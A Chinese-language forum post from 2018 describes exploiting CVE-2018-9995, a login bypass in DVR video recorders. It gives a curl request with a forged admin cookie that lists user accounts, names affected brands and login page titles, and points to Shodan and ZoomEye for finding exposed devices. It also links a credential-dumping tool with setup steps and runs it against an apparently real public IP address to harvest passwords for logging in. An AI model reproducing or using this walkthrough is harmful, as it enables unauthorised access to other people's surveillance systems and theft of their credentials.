cve-2018-9995 dvr登录绕过漏洞

本帖最后由 Snow狼 于 2018-6-4 10:27 编辑

dvr登录绕过漏洞
此漏洞允许×××者构造一个cookie即可登录
漏洞语句：curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
测试有此漏洞的dvr：
Novo
CeNovo
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MVDR Login
用shodan查询：

用zoomeye查询：

工具链接：https://pan.baidu.com/s/1X96sJRIwHZcnoBOcWq2CpQ密码：dcoc
依旧是我们的linux基础命令：
unzip 解压
cd 到文件目录
pip install -r requirements.txt
注意：getDvr为启动脚本下图的红框框

python2.7 getDVR_Credentials.py --host (ip地址) 59.152.178.44 --port (端口) 9000

看红圆圈即是爆出来的密码然后访问那个IP地址填写用户名和密码就可以登入了


这就基本显示出来了晒几张成果图